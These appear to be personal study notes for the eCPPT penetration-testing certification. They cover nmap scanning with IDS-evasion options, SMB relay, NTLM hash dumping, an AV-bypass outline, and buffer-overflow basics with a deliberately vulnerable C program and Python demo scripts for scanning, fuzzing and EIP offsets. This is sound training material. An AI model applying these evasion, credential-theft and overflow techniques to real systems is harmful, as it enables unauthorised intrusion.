eCPPT Certification Overview and Insights

The eCPPT Certification document outlines various topics related to penetration testing, including PowerShell, client-side attacks, web application testing, and network penetration testing. It details network fundamentals, including the OSI model, TCP/UDP protocols, and techniques for host discovery and network mapping. Additionally, it covers tools like Nmap for scanning and enumeration, emphasizing the importance of identifying vulnerabilities and understanding network defenses.


15/04/2025 11:45 eCPPT Certification

📕 eCPPT Certification
PowerShell for Pentesters
Client-Side attacks
Web Application Penetration Testing
Network Penetration testing
System Security & x86 Assembly Fundamentals
Exploit Development: Buffer Overflows
Privilege Escalation
Lateral Movement & Pivoting
Active Directory Penetration Testing
Command & Control (C2/C&C)

👉 Attack Defense Site → PA Dashboard

Pentest Reports

PowerShell for Pentesters


Client-Side attacks

Web Application Penetration Testing

[Link] 1/77

Network Penetration Testing


Active Information Gathering

Network mapping - Host Discovery - Port Scanning - Service & OS Detection

Active information gathering refers to the phase of the assessment where the tester
actively interacts with the target system or network to collect data and identify
potential vulnerabilities.


Networking fundamentals
Network protocols ensure that different computer systems, using different
hardware and software, can communicate with each other.
Packets are the units of information transferred between networked computers.

Packets structure

Header → ensures that the receiving host can correctly interpret the payload and
handle the overall communication (e.g. the header tells the receiver this is a TCP segment and which port it is for)
Payload → the actual information (e.g. an email message, a URL, etc.)

OSI Model - Open Systems Interconnection is a conceptual framework that
standardizes the functions of a communication or computer system into seven
abstraction layers.

Network Layer - [OSI n.3]


Network layer is responsible for logical addressing, routing and forwarding data
packets between devices across different networks.

🥅 GOAL
Determine the optimal path for data to travel from the source to the
destination, even if the devices are on separate networks.

Network layer protocols:


• IP
◦ IPv4 → the most widely used version of IP - 32-bit addresses
◦ IPv6 → 128-bit addresses
• ICMP - Internet Control Message Protocol
◦ Used for error reporting and diagnostics. ICMP includes ping (Echo Request / Echo Reply) and the "unreachable" errors that scanners rely on.

Network Layer
IP Header Format
IP protocol defines many different fields in the packet header.

Transport Layer
TCP - LAYER 4


• Connection-Oriented:
TCP establishes a connection between the sender and receiver before any
data is exchanged. This connection is a virtual circuit that ensures reliable
and ordered data transfer.
• Reliability:
TCP guarantees reliable delivery of data. It achieves this through
mechanisms such as acknowledgments (ACK) and retransmission of lost or
corrupted packets. If a segment of data is not acknowledged, TCP
automatically resends the segment.
• Ordered Data Transfer:
TCP ensures that data is delivered in the correct order. If segments of data
arrive out of order, TCP reorders them before passing them to the higher-layer
application.

🔎 Top TCP ports


21 → FTP
22 → SSH
25 → SMTP
80 → HTTP
110 → POP3
443 → HTTPS

3306 → MySQL
3389 → RDP
8080 → HTTP alternative port
27017 → MongoDB

UDP
• Used for Real-Time Applications:
UDP is commonly used in real-time applications where low latency is crucial,
such as audio and video streaming, online gaming, and voice-over-IP (VoIP)
communication.
• Simple and Stateless:
UDP is a stateless protocol, meaning that it does not maintain any state
information about the communication.


• Each UDP packet is independent of previous or future packets.

Network Mapping Objectives


• Discovery of Live Hosts:
Identifying active devices and hosts on the network. This involves
determining which IP addresses are currently in use.
• Identification of Open Ports and Services:
Determining which ports are open on the discovered hosts and identifying
the services running on those ports. This information helps pentesters
understand the attack surface and potential vulnerabilities.
• Network Topology Mapping:
Creating a map or diagram of the network topology, including routers,
switches, firewalls, and other network infrastructure elements. Understanding
the layout of the network assists in planning further penetration testing
activities.
• Operating System Fingerprinting:
Determining the operating systems running on discovered hosts. Knowing
the operating system helps pentesters tailor their attack strategies to target
vulnerabilities specific to that OS.
• Service Version Detection:
Identifying specific versions of services running on open ports. This
information is crucial for pinpointing vulnerabilities associated with particular
service versions.
• Identifying Filtering and Security Measures:
Discovering firewalls, intrusion prevention systems, and other security
measures in place. This helps pentesters understand the network's defenses
and plan their approach accordingly.

Host Discovery
Host discovery is a crucial phase to identify live hosts on a network before
further exploration and vulnerability assessment.
Techniques:


• Ping Sweeps (ICMP Echo Requests)
Sending ICMP Echo Requests (ping) to a range of IP addresses to identify live
hosts. This is a quick and commonly used method, but many hosts and firewalls
simply drop ICMP, so a missing reply does not prove the host is down.
• ARP Scanning
Using Address Resolution Protocol (ARP) requests to identify hosts on a local
network. ARP scanning is effective in discovering hosts within the same
broadcast domain, because a host cannot ignore ARP without losing connectivity.
• TCP SYN Ping
Sending TCP SYN packets to a specific port (often port 80) to check if a host
is alive. A live host answers with SYN-ACK if the port is open or with RST if it
is closed; either reply proves the host is up. This technique is stealthier than
ICMP ping.
• UDP Ping
Sending UDP packets to a specific port to check if a host is alive. A closed UDP
port makes the host send back an ICMP port unreachable error, which reveals it.
This can be effective for hosts that do not respond to ICMP or TCP probes.
• TCP ACK Ping
Sending TCP ACK packets to a specific port to check if a host is alive. The ACK
belongs to no existing connection, so a live host answers with a TCP RST (reset)
whether the port is open or closed; a RST therefore indicates that the host is
alive. This probe often passes stateless firewalls that only block SYNs.
• SYN-ACK Ping
Sending TCP SYN-ACK packets to a specific port to check if a host is alive. As
with the ACK ping, if a TCP RST is received, it indicates that the host is alive.

Ping Sweeps
A ping sweep is a network scanning technique used to discover live hosts
(computers, servers, or other devices) within a specific IP address range on a
network.

💡 IDEA
Send a series of ICMP Echo Request (ping) messages to a range of IPs
and observe the responses to determine which ones are active or
reachable.


## You can perform it via ping or fping
## fping sends ICMP Echo Request packets
fping -a -g [Link]/24
## -a = show alive hosts only
## -g = generate the target list from the CIDR range
## to hide the "unreachable" errors, redirect standard error to /dev/null:
fping -a -g [Link]/24 2>/dev/null

Port Scanning with Nmap

With the -Pn option we skip host discovery and scan the target even if it does not answer pings.

In order to scan all 65535 TCP ports use -p- (the default is the top 1000 ports).

🚨 Time-expensive command


Output of: nmap -Pn -p- <IP>

Port states in the output: open (a SYN-ACK came back), closed (the host answered
with a RST, so it is reachable but nothing listens there) and filtered (no reply,
or an ICMP unreachable error: a firewall is probably dropping the probe). A port
that is simply not open therefore shows as closed, not filtered.

Here port 80 is reported filtered, which tells me it is behind a firewall.
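The open/closed/filtered distinction above, and the TCP-ping rule that any answer (SYN-ACK or RST) proves a host is alive, can be reproduced without raw sockets. The following is an added example, not part of the original notes: it uses a full TCP connect() instead of nmap's half-open SYN (so it runs unprivileged), maps "connection refused" to closed and "no answer / ICMP error" to filtered, and scans a constructed loopback listener plus a port known to be closed. IPs, ports and timeouts are assumptions for the demo.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def classify_connect(host, port, timeout=1.0):
    """Classify one TCP port with a full connect() handshake.

    open     -> SYN-ACK came back and the handshake completed (a listener exists)
    closed   -> the host answered with RST (host is up, nothing listening)
    filtered -> no answer before the timeout, or an ICMP error: something in the
                path dropped the probe, which is what nmap means by 'filtered'
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except OSError:          # socket.timeout, ENETUNREACH, EHOSTUNREACH ...
            return "filtered"


def scan(host, ports, timeout=1.0, workers=32):
    """Parallel connect scan; returns {port: state}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        states = pool.map(lambda p: classify_connect(host, p, timeout), ports)
        return dict(zip(ports, states))


def host_is_up(results):
    """TCP-ping logic: an open OR closed answer proves the host is alive, since
    both need the target's TCP stack to reply. All-filtered is inconclusive."""
    return any(state in ("open", "closed") for state in results.values())


def start_listener():
    """Constructed target: a loopback service on an ephemeral port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:      # listener closed by demo(): stop serving
                return
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def reserve_closed_port():
    """Bind-and-release an ephemeral port so we know one that is closed now."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    srv, open_port = start_listener()
    closed_port = reserve_closed_port()
    try:
        results = scan("127.0.0.1", [open_port, closed_port])
    finally:
        srv.close()
    return results, open_port, closed_port


if __name__ == "__main__":
    results, open_port, closed_port = demo()
    for port, state in sorted(results.items()):
        print(f"127.0.0.1:{port} {state}")
    print("host up:", host_is_up(results))
```

Against a real target the "filtered" branch is the one a firewall produces; on loopback it cannot be triggered, which is why the demo only exercises open and closed. Point `scan()` at a host and port list of your own to see the third state.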

Service Version & OS Detection


First of all scan the subnet /24
nmap -sn [Link]/24


Hunt for target-1

Nothing important in the first scan.

Now run the same scan with the -sV option to get service version information.


To enable OS detection use the -O option (it needs at least one open and one closed port to fingerprint reliably).

We can make it guess more aggressively with --osscan-guess, at the cost of less certain results.


To tune version detection use --version-intensity <level> (level from
0 to 9; 9 sends all probes and is the slowest).

Nmap Scripting Engine (NSE)

The library of ready-made scripts is in the /usr/share/nmap/scripts
folder (ls -al /usr/share/nmap/scripts).

As an example, the scripts for mysql or http ([Link])


So we can use it with nmap:

nmap -sS -sV -sC -p- <IP> → -sC: equivalent to --script=default

🚨 The default category does not run intrusive scripts such as
[Link], because it is a brute-force script.


To run a specific script use --script=mongodb-info

🚨 Since there are other services such as memcached and ftp,
look at and run only the scripts relevant to each service!

🚨 REMEMBER that two or more NSE selections can be given separated by ",", and that
"*" is a wildcard to load every matching script: --script "ftp-*,memcached-*".
A bare name must match a script file, a category or a directory, so "ftp" on its own
does not select the ftp scripts; quote the wildcard so the shell does not expand it.

Firewall/IDS Evasion


The -sA option (ACK scan) sends ACK packets to the host. It never tells whether a
port is open: it only distinguishes filtered from unfiltered. A host that receives an
unsolicited ACK replies with RST whether the port is open or closed, so a RST means the
probe got through (unfiltered). No reply, or an ICMP unreachable error, means something
between our machine and the target is dropping the probe (filtered), i.e. probably a
firewall. Run a SYN scan on the same ports to tell open from closed among the unfiltered ones.

📌 State = filtered → firewall between us and the target

State = unfiltered → the probe reaches the target; open/closed is still unknown


💡 Fragmenting packets can help get past IDS/IPS signatures that look at single
packets; modern engines reassemble fragments, so treat it as one option, not a guarantee.

Use option -f (requires raw packet privileges, i.e. root)

or
--data-length <n> to append random data to the packets sent, and the
-D option to cloak the scan with decoys (the target then sees the probes come
from the decoy IPs, e.g. .4, .2 and so on, as well as from us).
Example with --data-length 200:

nmap -Pn -sS -sV -p445,3389 -f --data-length 200 -D [Link],[Link] [Link]

Optimize Nmap Scans


• --host-timeout <time> (e.g. 30s, 5m) gives up on a host after that
time and moves on to the next target.

🚨 Remember that this option may miss important things, since some
hosts can take longer to respond.
Use with caution!

• -T<0-5> selects a timing template, from -T0 (paranoid, slowest) to
-T5 (insane, fastest). -T4 is the usual choice on a reliable network;
-T1/-T2 are for staying under IDS rate thresholds.

Nmap Output Formats

-oN <file> normal, -oX <file> XML, -oG <file> grepable, -oA <basename> all three at once. XML is the one to parse with tooling.

DEMO:
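Nmap's XML output is the one to feed into other tooling. As an added example that is not part of the original notes, here is a parser for `-oX` output that lists live hosts and their open services; SAMPLE_XML is a constructed, trimmed scan result (the addresses, products and versions in it are made up), and the element and attribute names are the ones nmap actually emits.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -sV -oX out.xml` output, trimmed to the parts used.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX out.xml 10.0.0.0/28">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="8.2p1"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="filtered" reason="no-response"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open" reason="syn-ack"/>
        <service name="microsoft-ds"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="10.0.0.6" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Turn an nmap XML document into a list of host dicts:
    {"addr": str, "up": bool, "ports": [{"port", "proto", "state", "reason",
                                         "service", "product"}]}"""
    root = ET.fromstring(xml_text)
    hosts = []
    for h in root.iter("host"):
        status = h.find("status")
        addr = h.find("address[@addrtype='ipv4']")
        entry = {
            "addr": addr.get("addr") if addr is not None else None,
            "up": status is not None and status.get("state") == "up",
            "ports": [],
        }
        for p in h.iter("port"):
            st = p.find("state")
            svc = p.find("service")
            product = None
            if svc is not None:
                # nmap splits banner info into product/version; join what exists
                product = " ".join(v for v in (svc.get("product"), svc.get("version")) if v) or None
            entry["ports"].append({
                "port": int(p.get("portid")),
                "proto": p.get("protocol"),
                "state": st.get("state"),
                "reason": st.get("reason"),     # why nmap chose that state (syn-ack, reset, no-response)
                "service": svc.get("name") if svc is not None else None,
                "product": product,
            })
        hosts.append(entry)
    return hosts


def open_services(hosts):
    """Flatten to (addr, port, service, product) for every open port on a live host,
    which is the list you hand to the enumeration phase."""
    return [(h["addr"], p["port"], p["service"], p["product"])
            for h in hosts if h["up"]
            for p in h["ports"] if p["state"] == "open"]


if __name__ == "__main__":
    for addr, port, service, product in open_services(parse_nmap_xml(SAMPLE_XML)):
        print(f"{addr}:{port}\t{service}\t{product or ''}")
```

Replace `SAMPLE_XML` with `open("out.xml").read()` to run it on a real scan; the `reason` field is worth keeping because it distinguishes a port that answered from one that was merely assumed.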

Enumeration


After host discovery and port scanning phase the next logical phase is
Enumeration
The goal of service enumeration is to gather additional, more
specific/detailed information about the hosts/systems on a network and
the services running on said hosts.
Information like account names, shares, misconfigured services and
so on.

SMB & NetBIOS Enumeration

NetBIOS is an API and a set of network protocols for providing
communication services over a local network.
It is used primarily to allow applications on different computers to find and
interact with each other on a network.
• Name Service (NetBIOS-NS)
Allows computers to register, unregister, and resolve names on the local
network.
• Datagram Service (NetBIOS-DGM)
Supports connectionless communication and broadcasting.
• Session Service (NetBIOS-SSN)
Supports connection-oriented communication for more reliable data
transfers.


📌 PORT Used
- 137 Name Service
- 138 Datagram Service
- 139 Session Service

SMB is a network file sharing protocol that allows computers on a network
to share files, printers, and other resources. It is the primary protocol used
in Windows networks for these purposes.
📌 PORT
- 445 SMB traffic
- 139 when operating with NetBIOS

DEMO: (no access)

💡 This lab is useful for pivoting: once we find a service exposed
on machine X, a reverse shell plus a socks4a proxy through it lets us
reach a second machine Y that is pingable only from X.

SNMP Enumeration
SNMP (Simple Network Management Protocol) is a widely used protocol
for monitoring and managing networked devices, such as routers,
switches, printers, servers and more.
It allows network administrators to query devices for status information,
configure certain settings, and receive alerts or traps when specific events
occur.


📌 PORT
- 161 UDP SNMP queries
- 162 UDP SNMP traps (notification)

⚠️ SNMP enumeration in penetration testing involves querying
SNMP-enabled devices to gather information useful for identifying potential
vulnerabilities, misconfigurations, or points of attack. The classic finding is
a readable default community string such as "public".

● Identify SNMP-Enabled Devices:


Determine which devices on the network have SNMP enabled
and whether they are vulnerable to information leakage or
attacks.
● Extract System Information:
Collect system-related data like device names, operating
systems, software versions, network interfaces, and more.
● Identify SNMP Community Strings:
Test for default or weak community strings, which can grant
unauthorized access to device information.
● Retrieve Network Configurations:
Gather information about routing tables, network interfaces, IP
addresses, and other network-specific details.
● Collect User and Group Information:
In some cases, SNMP can reveal user account information and
access permissions.
● Identify Services and Applications:
Find out which services and applications are running on the
target devices, potentially leading to further attack vectors.

DEMO: (no access)

💡 FLOW = nmap (network scan) → nmap scripts → find users →
hydra/crackmapexec/psexec → metasploit reverse shell →
access


Linux Service Enumeration

DEMO: (no access)

Windows Exploitation
An SMB relay attack is a type of network attack where an attacker
intercepts SMB (Server Message Block) authentication traffic and forwards it
to a legitimate server to gain unauthorized access to resources or perform
malicious actions.

📌 SMB mostly concerns Windows networks, because of how widely
SMB file sharing is used there!

SMB Relay Attack - how does it work?

• Interception:
The attacker sets up a man-in-the-middle position between the client
and the server. This can be done using various techniques, such as ARP
spoofing, DNS poisoning (in practice usually LLMNR/NBT-NS poisoning), or
setting up a rogue SMB server.
• Capturing Authentication:
When a client connects to the attacker's server via SMB, it performs NTLM
(NT LAN Manager) authentication. The attacker captures the challenge-response
exchange (often called the Net-NTLM hash), not the user's password.
• Relaying to a Legitimate Server:
Instead of trying to crack the captured response offline, the attacker forwards
it in real time to another server that accepts the same authentication. This
allows the attacker to impersonate the user whose authentication was captured.
The relay only works against servers that do not require SMB signing.
• Gain Access:
If the relay is successful, the attacker can gain access to the resources
on the server, which might include sensitive files, databases, or
administrative privileges. This access could lead to further lateral
movement within the network, compromising additional systems.
DEMO: (no access)
DEMO: (no access)


Linux Exploitation

DEMO: (no access)

Post Exploitation

The Windows OS stores hashed user account passwords locally in the SAM
(Security Account Manager) database.
SAM (Security Account Manager) is a database file that is responsible for
managing user accounts and passwords on Windows. All user account passwords
stored in the SAM database are hashed.

💡 In modern versions of Windows, the hashes in the SAM database are additionally
encrypted with the SYSKEY (boot key), which is why dumping them offline needs
both the SAM and the SYSTEM hives.

NTLM HASH - (NTHash)

NTLM is a collection of authentication protocols that are utilized in
Windows to facilitate authentication between computers. The authentication
process involves using a valid username and password to authenticate successfully.

Dumping & Cracking NTLM Hashes

We can dump NTLM hashes with:
• mimikatz
• Meterpreter hashdump (Kiwi)
Afterwards crack them with:
• Hashcat
• John the Ripper
DEMO: (no access)
DEMO: (no access)

Bypassing AV

Bypass types
Common AV bypass using a combination of reverse_tcp (to download the file on
the target machine and obtain access), Veil and UPX in order to create a
malicious payload and then compress the executable file.
DEMO: (no access)

System Security & x86 Assembly Fundamentals

CPU Architecture
A CPU (Central Processing Unit) is often referred to as the brain of a computer,
responsible for executing instructions and performing calculations.
CPU instructions are represented in hexadecimal (HEX) format.
Machine code is translated into ASM (Assembly Language).
Assembly language is a low-level programming language that is closely related
to the machine code instructions of a specific CPU architecture.

• Control Unit (CU): The control unit is responsible for coordinating and
controlling the operations of the CPU.
• Arithmetic Logic Unit (ALU): The ALU is the component responsible for
performing arithmetic and logical operations. It performs basic operations like
add, sub, mult and AND, OR, NOT.
• Registers: Registers are small, high-speed storage locations within the CPU
used to store data temporarily during processing.
Common types of registers include:
◦ Program Counter (PC): Holds the memory address of the next
instruction to be fetched
◦ Instruction Register (IR): Holds the currently executing instruction
◦ Accumulator: Stores the result of arithmetic and logic operations
◦ General-Purpose Registers: Used to store intermediate values and
operands during instruction execution

A CPU has its own ISA (Instruction Set Architecture). The ISA is the set of instructions
that a programmer must understand and use to write a program correctly for
that specific CPU and machine.

Registers
Registers are located within the CPU and are used to temporarily hold data that
is being processed or manipulated by the CPU.

General Purpose Registers

GPRs are used to store data temporarily during program execution.
Examples of general-purpose registers include:

General data manipulation and arithmetic operations:
- EAX - Accumulator Register: used for arithmetic results and holds function return values
- EBX - Base Register: used as a pointer to data
- ECX - Counter Register: counter used in shift/rotate instructions and loops
- EDX - Data Register: used in arithmetic operations and I/O

String manipulation operations:
- ESI - Source Index Register: used as a pointer to the source in stream operations
- EDI - Destination Index Register: used as a pointer to the destination in stream operations

Managing the stack:
- ESP - Stack Pointer Register: pointer to the top of the stack
- EBP - Base Pointer Register: pointer to the base of the current stack frame

Increased addressable memory space (64-bit):
- RAX, RBX, RCX, RDX: the 64-bit extensions of EAX, EBX, ECX, EDX

💡 In the 8-bit naming convention the register is divided into L (low byte) and H (high
byte), e.g. AL and AH.
In the 16-bit naming convention the L and H are combined and replaced
with an X (AX).
In the 32-bit representation, the register name is prefixed with
an E, meaning extended (EAX).
Whereas in the 64-bit representation, the E is replaced with an R (RAX).

Instruction Pointer - EIP


The Instruction Pointer controls the program execution by storing a pointer to
the address of the next instruction that will be executed.

Process Memory
Process memory is a fundamental aspect of operating systems, responsible for
organizing and managing memory resources for running programs.
Process memory is typically divided into segments:
• Code segment: Contains the executable code of the program
• Data segment: Stores initialized data, such as global variables and static
variables.
• BSS segment: Contains uninitialized data, zeroed when the program starts
• Heap segment: Dynamically allocated memory for program data structures
• Stack segment: Stores function call frames, local variables, and function
parameters.


Understanding the Stack

The stack is a data structure in computer science and plays a crucial role in the
execution of programs. It is a region of memory.
LIFO - Last In First Out → meaning that the last item pushed onto the stack is the
first one to be popped off.
The stack pointer (ESP) points to the top of the stack, i.e. the address of the
last item pushed; that is where the next push or pop operates.

Heap → starts at lower addresses and grows upward (toward higher addresses), while

Stack → starts near the end of the process's memory and grows downward (toward
lower addresses). On x86 the "top" of the stack is therefore its lowest address.

Push is an operation that adds an element to the top of the stack:
- decrement the stack pointer (ESP = ESP - 4 on 32-bit)
- store the element at the new ESP
Pop is an operation that removes the top element from the stack:
- read the element at ESP
- increment the stack pointer (ESP = ESP + 4)


💡 Calculator online
Decimal to Hex Converter

Example 1 - PUSH

PUSH E → ESP - 4

Example 2 - PUSH

PUSH 1 → ESP - 4 again (the figure shows the addresses in hex)

Example 3 - POP

POP → ESP + 4

Stack Frames
A stack frame is a data structure used by the CPU and the operating system
to manage function calls and execution flow within a program.

Functions contain two important components, the prologue and the epilogue.
The prologue prepares the stack to be used (like a bookmark): it saves the caller's
EBP and sets up the new frame.
The epilogue resets the stack to the state the prologue found.
When the subroutine ends, two things happen:
• The caller receives the return value of the subroutine.
• The Instruction Pointer (EIP) is restored to the instruction following the
initial call, using the return address that CALL pushed on the stack.

Example


💡 Syscall
[Link]

DEMO:


To run this program we need to:

## convert it into an object file
nasm -f elf32 -o hello_world.o [Link]
## create the executable
ld -m elf_i386 -o hello_world hello_world.o
## then you can run it
./hello_world


Exploit Development: Buffer Overflows


The term buffer is loosely used to refer to any area in memory where more than
one piece of data is stored.
An overflow occurs when we try to fill more data than the buffer can handle.

Example (deliberately vulnerable):

#include <string.h>

int main(int argc, char** argv) {
    argv[1] = (char*)"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";  /* 37 bytes */
    char buffer[10];
    strcpy(buffer, argv[1]);   /* no length check: 37 bytes into a 10-byte buffer */
    return 0;
}

## to compile this code use gcc test.c -o test

When we execute it we obtain this error (the compiler's stack protector detects
that the canary next to the buffer was overwritten and aborts the program).

If we build the code with

gcc -fno-stack-protector test.c -o test

the check is gone: the overflow reaches the saved EBP and the return address,
and the program crashes (typically a segmentation fault when main returns).

💡 In order to fix this we need to check the number of characters we
insert.
Use strncpy with the destination size, e.g. strncpy(buffer, argv[1], sizeof(buffer) - 1),
and then set buffer[sizeof(buffer) - 1] = '\0', because strncpy does not add the
terminator when the source is longer than the limit.
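The PUSH/POP rules, the prologue/epilogue sequence and the strcpy example above can be played through in a small model of the 32-bit stack. The following is an added example and not code from the notes: `Stack32` models memory as a byte map with ESP moving downward, `call_vulnerable` replays CALL, the prologue, an unbounded copy into a 10-byte local buffer, and the epilogue, and `cyclic_pattern`/`eip_offset` reproduce the pattern_create/pattern_offset trick for locating the bytes that land in EIP. The top-of-stack address, the return address and the padding-free 10-byte frame are assumptions; a real compiler aligns the frame, so the offset you measure in a debugger differs from the 14 found here.

```python
import struct


class Stack32:
    """Model of the x86 stack: memory grows toward lower addresses and ESP holds
    the address of the last pushed dword. Constructed for illustration only."""

    def __init__(self, top=0xBFFFF000):           # assumed top of the stack region
        self.mem = {}                               # address -> byte value
        self.esp = top                              # empty stack: ESP at the top

    def write(self, addr, data):
        for i, b in enumerate(data):
            self.mem[addr + i] = b

    def read(self, addr, n):
        return bytes(self.mem.get(addr + i, 0) for i in range(n))

    def push(self, value):
        self.esp -= 4                                   # PUSH: ESP = ESP - 4 ...
        self.write(self.esp, struct.pack("<I", value))  # ... then store the dword
        return self.esp

    def pop(self):
        value = struct.unpack("<I", self.read(self.esp, 4))[0]  # POP: read the top ...
        self.esp += 4                                           # ... then ESP = ESP + 4
        return value


def call_vulnerable(stack, ret_addr, buf_size, payload, saved_ebp=0xBFFFEFF0):
    """Replay CALL + prologue of a function with a `buf_size`-byte local buffer,
    an unbounded strcpy of `payload` into it, and the epilogue.
    Returns (ebp, eip) as restored by LEAVE/RET: the values the CPU would use."""
    stack.push(ret_addr)          # CALL pushes the return address
    stack.push(saved_ebp)         # prologue: PUSH EBP
    ebp = stack.esp               #           MOV EBP, ESP
    stack.esp -= buf_size         #           SUB ESP, buf_size (the local buffer)
    buf = stack.esp
    stack.write(buf, payload)     # strcpy(buffer, argv[1]) with no length check
    stack.esp = ebp               # epilogue: LEAVE = MOV ESP, EBP ...
    new_ebp = stack.pop()         #                   ... POP EBP
    new_eip = stack.pop()         #           RET    = POP EIP
    return new_ebp, new_eip


def cyclic_pattern(length):
    """pattern_create-style non-repeating text (Aa0Aa1Aa2...), so that any 4 bytes
    identify their own position in the buffer."""
    out = bytearray()
    for u in "ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for l in "abcdefghijklmnopqrstuvwxyz":
            for d in "0123456789":
                out += f"{u}{l}{d}".encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def eip_offset(pattern, eip_value):
    """pattern_offset: position in the payload of the 4 bytes now sitting in EIP
    (EIP holds them little-endian, so pack them back before searching)."""
    return pattern.find(struct.pack("<I", eip_value))


def demo():
    ret_addr = 0x08048456                                  # assumed return address
    ebp, eip = call_vulnerable(Stack32(), ret_addr, 10, b"A" * 37)   # the strcpy example
    pattern = cyclic_pattern(40)
    _, eip_from_pattern = call_vulnerable(Stack32(), ret_addr, 10, pattern)
    return ebp, eip, eip_offset(pattern, eip_from_pattern)


if __name__ == "__main__":
    ebp, eip, offset = demo()
    print(f"EBP=0x{ebp:08x} EIP=0x{eip:08x} (0x41 == 'A'); EIP offset in payload = {offset}")
```

With the 37 'A's both the saved EBP and the return address become 0x41414141, which is exactly what a debugger shows at the crash. The 40-byte pattern run shows the workflow used in the later exploit-development labs: read EIP at the crash, find its offset, put the address you want there.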

Finding Buffer Overflows

💡ulnerable functions (no bounds check, or a check the caller gets wrong):
○ strcpy
○ strcat
○ gets (and fgets when called with the wrong size)
○ vsprintf / sprintf
○ printf (format-string bugs when user input is used as the format)
○ memcpy

BOF Hunting Techniques


• When a crash occurs, be prepared to hunt for the vulnerability with a
debugger (the most efficient and well-known technique).
• Some companies use cloud fuzzing to brute-force crashes (using file-based
inputs). Whenever a crash is found, it is recorded for further
analysis.
• A dynamic analysis tool like a fuzzer or tracer, which tracks all executions
and the data flow, can help in finding problems/errors/crashes.

Fuzzing
Fuzzing is a software testing technique that feeds a program invalid, unexpected
or random data and watches for crashes.
Input can be in any form such as:
• Command line
• Parameters
• Network data
• File input
• Databases
• Shared memory regions
• Keyboard/mouse input
• Environment variables
Fuzzing aims to identify such vulnerabilities by systematically testing various
input combinations to see if they cause the program to crash or exhibit
unexpected behavior.
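For network input the simplest fuzzer is the length ramp (SPIKE's `s_string_variable`, or `"A" * N` in a loop): send ever-longer inputs until the service stops answering, then record that length as the first crash. The following is an added example and not from the notes: the "vulnerable service" is a constructed loopback stand-in that drops the connection on inputs of 64 bytes or more, and the ports and step size are assumptions. A real daemon would be gone after the first crash, so a refused connection is also counted as a failure.

```python
import socket
import threading

CRASH_AT = 64   # the constructed service "dies" on inputs of this many bytes or more


def start_vulnerable_service():
    """Constructed stand-in for a daemon with a fixed-size input buffer: it answers
    short inputs and, for CRASH_AT bytes or more, closes without replying, which is
    how a crashed or killed process looks from the client side."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listener closed: stop
                return
            with conn:
                data = conn.recv(4096)
                if len(data) < CRASH_AT:
                    conn.sendall(b"OK " + data)

    threading.Thread(target=serve, daemon=True).start()
    return srv, srv.getsockname()[1]


def send_probe(host, port, data, timeout=2.0):
    """One fuzz case. Returns the reply bytes, or None when the service gave no reply,
    reset the connection, or refused it (the process is gone after a real crash)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(data)
            reply = s.recv(4096)
    except OSError:              # ConnectionRefusedError, timeout, reset
        return None
    return reply or None         # b"" means the peer closed without answering


def fuzz_length(host, port, start=8, step=8, limit=4096, filler=b"A"):
    """Length-ramp fuzzing: send filler * length for growing lengths and report the
    first length that makes the service stop answering (None if nothing up to
    `limit` does). The previous length is the largest input the service survived."""
    length = start
    while length <= limit:
        if send_probe(host, port, filler * length) is None:
            return length
        length += step
    return None


def demo():
    srv, port = start_vulnerable_service()
    try:
        return fuzz_length("127.0.0.1", port)
    finally:
        srv.close()


if __name__ == "__main__":
    print("first crashing length:", demo())
```

The step size is the trade-off: a coarse step finds the crash quickly, then a second pass with step 1 between the last good and first bad length gives the exact boundary to use when building the pattern for the debugger.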


💡 SPIKE

DEMO: (no access)

Structured Exception Handling (SEH)

SEH is a mechanism employed by the Windows operating system to manage
exceptions or errors that occur during program execution.
How does it work?
• Exception detection: When an exception occurs (for example, an attempt to
access an invalid memory area), Windows interrupts the normal execution of the
program and looks for an exception handler. Exceptions can be raised by the
processor, by the operating system or by the application itself.
• Exception handler chain: Each thread has its own chain of exception handlers,
whose records live on the thread's stack. When execution enters a block of code
protected by SEH, a new handler record is added at the head of this chain. The
record contains the address of the handler function and a pointer to the next
record, i.e. how to handle a particular exception and where to continue.
• Exception handling: If an exception occurs, Windows walks the handler chain,
starting from the most recently added handler, looking for one that can handle
the specific type of exception. When it finds an appropriate handler, Windows
passes control to it, and the handler can:
◦ Handle the exception, correcting the problem or logging the error.
◦ Terminate the application if the exception is fatal.
◦ Ignore the exception and continue normal execution, although this is
not a recommended practice.
• Cleanup: After an exception has been handled, the operating system can
perform the necessary cleanup operations, such as restoring system state or
releasing resources.
Because the handler records sit on the stack, a stack-based overflow can overwrite
the handler address; the next exception then transfers control to attacker-chosen
code. That is why SEH appears in the exploit development material.

DEMO: (no access)


Privilege Escalation
Privilege Escalation is a critical concept in penetration testing and red teaming.
It refers to the process of gaining elevated access or additional privileges in a
computer system or network.
